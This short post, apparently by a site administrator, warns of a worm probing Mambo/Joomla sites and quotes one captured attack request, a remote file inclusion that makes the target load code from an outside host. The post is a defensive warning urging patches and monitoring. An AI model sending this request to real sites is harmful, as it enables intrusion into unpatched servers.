Worm looking for vulnerable Mambo/Joomla installs

Some worm is doing the rounds. Requests look like this:

/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ebbw.net/components/com_magazine/layouts/id.txt?

The payload only checks for the user id, but can easily be changed of course.

Update your stuffs and update your tripwires.